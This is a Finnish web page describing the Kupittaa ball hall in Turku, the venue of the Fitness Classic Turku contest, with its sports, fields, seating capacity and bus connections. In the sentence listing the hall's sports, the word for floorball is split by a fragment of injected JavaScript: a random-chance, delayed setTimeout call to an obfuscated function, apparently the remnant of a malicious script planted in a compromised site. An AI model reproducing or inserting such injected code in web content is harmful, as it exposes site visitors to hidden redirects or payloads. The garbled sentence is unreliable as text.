Kupittaan Palloiluhalli, Turku


Kupittaan Palloihalli sijaitsee Kupittaan urheilupuistossa Turussa ja se on valmistunut vuonna 2017. Paikka valittiin Fitness Classic Turku -kilpailun järjestämispaikaksi sen modernin teknologian takia, johon kuuluu mm. erittäin hyvä ilmanvaihto, joka on hyvin tärkeää näin viruepidemian aikana. Lisäksi Kupittaan palloiluhalli on korkea ja siellä on hyvät katsomot.


Kupittaan palloiluhallin pääkäyttäjälajit ovat futsal, koripallo, käsipallo, lentopallo, salibandom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andy ja voimistelu.
– Harjoituskäytössä on kolme täysmittaista (n. 22 metriä x 42 metriä) kenttää, jotka ovat erotettavissa toisistaan väliverholla.
– Pelejä tai tapahtumia voidaan järjestää yhdellä kentällä (n. 100 katsojapaikkaa) tai pääkentällä (n. 2700 katsojapaikkaa 2/3 pelikentällä (n. 1200–1700 katsojapaikkaa).
– Hallin yksi liikunta-alue on päällystetty synteettisellä urheilumatolla ja kolmesta kentästä kaksi on parketilla. Hallissa on 13 pukuhuonetta ja n. 190 m2:n oheisharjoittelutila, jota hallissa harjoittelevat seurat voivat varata. Tilassa on mm. kolme painonnostolavaa ja vapaata tilaa muulle oheisharjoittelulle.


Kartalla


Klikkaa tätä linkkiä


Saapuminen


Föli-bussit: 58, 60, 221, 709 ja 32a.
Aikataulut: https://reittiopas.foli.fi


 


 


 


 


 


 


 

Seuraa meitä instagramissa